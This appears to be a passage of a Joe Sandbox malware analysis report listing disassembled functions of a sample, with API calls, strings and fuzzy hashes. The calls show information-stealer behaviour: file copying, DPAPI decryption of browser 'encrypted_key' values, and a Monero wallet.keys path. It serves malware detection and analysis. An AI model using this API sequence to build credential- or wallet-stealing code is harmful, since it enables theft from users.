                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen
                                      • String ID:
                                      • API String ID: 367037083-0
                                      • Opcode ID: cb538519111debf987dee31d78a30044fbd10fa07c837767889cead12634d231
                                      • Instruction ID: 180490e915b978f5d34b50dcc39fb7036c7656724b9feaf681ad73b1a5ace56e
                                      • Opcode Fuzzy Hash: cb538519111debf987dee31d78a30044fbd10fa07c837767889cead12634d231
                                      • Instruction Fuzzy Hash: 47415171E001199FCF04EFE4E896AEEB778AF58304F408518F5167B290EB74AA55CFA1
                                      Function 00124E00 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 118stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00128F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00128F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00124E3A
                                      • lstrcat.KERNEL32(?,00E3E6A0), ref: 00124E58
                                        • Part of subcall function 00124B60: wsprintfA.USER32 ref: 00124B7C
                                        • Part of subcall function 00124B60: FindFirstFileA.KERNEL32(?,?), ref: 00124B93
                                        • Part of subcall function 00124B60: StrCmpCA.SHLWAPI(?,00130FC4), ref: 00124BC1
                                        • Part of subcall function 00124B60: StrCmpCA.SHLWAPI(?,00130FC8), ref: 00124BD7
                                        • Part of subcall function 00124B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00124DCD
                                        • Part of subcall function 00124B60: FindClose.KERNEL32(000000FF), ref: 00124DE2
                                        • Part of subcall function 00124B60: wsprintfA.USER32 ref: 00124C00
                                        • Part of subcall function 00124B60: StrCmpCA.SHLWAPI(?,001308D3), ref: 00124C15
                                        • Part of subcall function 00124B60: wsprintfA.USER32 ref: 00124C32
                                        • Part of subcall function 00124B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00124C6E
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,00E3F910), ref: 00124C9A
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,00130FE0), ref: 00124CAC
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,?), ref: 00124CC0
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,00130FE4), ref: 00124CD2
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,?), ref: 00124CE6
                                        • Part of subcall function 00124B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00124CFC
                                        • Part of subcall function 00124B60: DeleteFileA.KERNEL32(?), ref: 00124D81
                                        • Part of subcall function 00124B60: wsprintfA.USER32 ref: 00124C57
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: `$
                                      • API String ID: 2104210347-12876440
                                      • Opcode ID: 6deb13aa4fe840064d454561574e352db515ed503fb903d1f6559abe19390610
                                      • Instruction ID: 55fc590695ba58c305e540b2611dcdb03de618f8c669cbe4b50b4da29dc39faf
                                      • Opcode Fuzzy Hash: 6deb13aa4fe840064d454561574e352db515ed503fb903d1f6559abe19390610
                                      • Instruction Fuzzy Hash: 3841B8B76001086BC765F760FC93EEE733D9BE9340F404658B6465A185EF709AD88BD1
                                      Function 0011A430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0011A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0011A13C
                                        • Part of subcall function 0011A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0011A161
                                        • Part of subcall function 0011A110: LocalAlloc.KERNEL32(00000040,?), ref: 0011A181
                                        • Part of subcall function 0011A110: ReadFile.KERNEL32(000000FF,?,00000000,0011148F,00000000), ref: 0011A1AA
                                        • Part of subcall function 0011A110: LocalFree.KERNEL32(0011148F), ref: 0011A1E0
                                        • Part of subcall function 0011A110: CloseHandle.KERNEL32(000000FF), ref: 0011A1EA
                                        • Part of subcall function 00128FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00128FE2
                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0011A489
                                        • Part of subcall function 0011A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00114F3E,00000000,00000000), ref: 0011A23F
                                        • Part of subcall function 0011A210: LocalAlloc.KERNEL32(00000040,?,?,?,00114F3E,00000000,?), ref: 0011A251
                                        • Part of subcall function 0011A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00114F3E,00000000,00000000), ref: 0011A27A
                                        • Part of subcall function 0011A210: LocalFree.KERNEL32(?,?,?,?,00114F3E,00000000,?), ref: 0011A28F
                                        • Part of subcall function 0011A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0011A2D4
                                        • Part of subcall function 0011A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0011A2F3
                                        • Part of subcall function 0011A2B0: LocalFree.KERNEL32(?), ref: 0011A323
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                      • String ID: $"encrypted_key":"$DPAPI
                                      • API String ID: 2100535398-738592651
                                      • Opcode ID: 18da07ee6eb72c8be53a3c17e3846db60f91c40e6ef4c571d232a07f15f9fb0b
                                      • Instruction ID: f16864498edd29476cdd834bcc17befc991811b897954d5af742f3f76783ca21
                                      • Opcode Fuzzy Hash: 18da07ee6eb72c8be53a3c17e3846db60f91c40e6ef4c571d232a07f15f9fb0b
                                      • Instruction Fuzzy Hash: 143166B6D05109ABCF08DFD4ED45AEFB7B9BF58340F444528E901A7241E7349E44CB62
                                      Function 00128810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001305BF), ref: 0012885A
                                      • Process32First.KERNEL32(?,00000128), ref: 0012886E
                                      • Process32Next.KERNEL32(?,00000128), ref: 00128883
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • CloseHandle.KERNEL32(?), ref: 001288F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: 69e5732c01b243eb10eebcd8e394c438bb371f5ef832844804883ac6f74a8742
                                      • Instruction ID: ee3224303daecd8d961ddd19c0573352504670c16e92bd7a87306d3a5050cf08
                                      • Opcode Fuzzy Hash: 69e5732c01b243eb10eebcd8e394c438bb371f5ef832844804883ac6f74a8742
                                      • Instruction Fuzzy Hash: A4317E71901228ABCB25DF94EC51FEEB378FF54700F504599F10AA61A0EB306A54CFA1
                                      Function 0018FDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0018FE13
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0018FE2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Value___vcrt_
                                      • String ID:
                                      • API String ID: 1426506684-0
                                      • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction ID: 2c1c352df247a3e5fd5801c89220d09138e357d0281c171851d1a5950096bef8
                                      • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction Fuzzy Hash: 4F01D432109726FEFA3436745CC99673694EB117B5736433DF516801F2EF524D829640
                                      Function 00129470 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(00123D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00123D3E,?), ref: 0012948C
                                      • GetFileSizeEx.KERNEL32(000000FF,00123D3E), ref: 001294A9
                                      • CloseHandle.KERNEL32(000000FF), ref: 001294B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID:
                                      • API String ID: 1378416451-0
                                      • Opcode ID: 4a2d147b0639a9971c33b5c90bb8e34166d939edefe9e102043680b932bec1d2
                                      • Instruction ID: 1c6f09c5518692aa7589067bc855a04d88cbb90eea04c2eea659e3ef5cfdc68d
                                      • Opcode Fuzzy Hash: 4a2d147b0639a9971c33b5c90bb8e34166d939edefe9e102043680b932bec1d2
                                      • Instruction Fuzzy Hash: EFF04435E04348BBDB24DFB4EC89F5E77B9AB48714F10C654FA11AB1C0D774A6119B50
                                      Function 0012CA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 0012CA7E
                                        • Part of subcall function 0012C2A0: __amsg_exit.LIBCMT ref: 0012C2B0
                                      • __getptd.LIBCMT ref: 0012CA95
                                      • __amsg_exit.LIBCMT ref: 0012CAA3
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0012CAC7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 300741435-0
                                      • Opcode ID: 686272de927f9879300e9206ba5ac1dba56cde4a63b3137403268d8433db90c4
                                      • Instruction ID: 3ac53079b3edd5392bdbebaa20570b7e255316041bed5469647961020d8d8a3c
                                      • Opcode Fuzzy Hash: 686272de927f9879300e9206ba5ac1dba56cde4a63b3137403268d8433db90c4
                                      • Instruction Fuzzy Hash: AAF0B432948338DBD720FBB8B84374E33A0AF20720F110149F605A72D2FF2459A08BD6
                                      Function 001904D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Catch
                                      • String ID: MOC$RCC
                                      • API String ID: 78271584-2084237596
                                      • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                      • Instruction ID: f9badc0313689fa0ffeed56390faa0ec1e9c0054c6115a42dc3493e5258da317
                                      • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                      • Instruction Fuzzy Hash: 71414871900209EFDF16DF98DC81AAEBBB5BF48304F198199FA04A6251D335AA90DF51
                                      Function 00125190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00128F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00128F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 001251CA
                                      • lstrcat.KERNEL32(?,00131058), ref: 001251E7
                                      • lstrcat.KERNEL32(?,00E39400), ref: 001251FB
                                      • lstrcat.KERNEL32(?,0013105C), ref: 0012520D
                                        • Part of subcall function 00124B60: wsprintfA.USER32 ref: 00124B7C
                                        • Part of subcall function 00124B60: FindFirstFileA.KERNEL32(?,?), ref: 00124B93
                                        • Part of subcall function 00124B60: StrCmpCA.SHLWAPI(?,00130FC4), ref: 00124BC1
                                        • Part of subcall function 00124B60: StrCmpCA.SHLWAPI(?,00130FC8), ref: 00124BD7
                                        • Part of subcall function 00124B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00124DCD
                                        • Part of subcall function 00124B60: FindClose.KERNEL32(000000FF), ref: 00124DE2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      • Opcode ID: abb2c7ba79b4122771c57d172d58e3e905a770096162075fbd4c849b3abf9e45
                                      • Instruction ID: c229e3164f6897abd90881b716f97bfb849493b67d9fbe5d7cc0e0d96af2b884
                                      • Opcode Fuzzy Hash: abb2c7ba79b4122771c57d172d58e3e905a770096162075fbd4c849b3abf9e45
                                      • Instruction Fuzzy Hash: 2C21FCB6904218ABCB65FBB0FC93EED733D9BA4300F404658B655971D1EF709AC88B91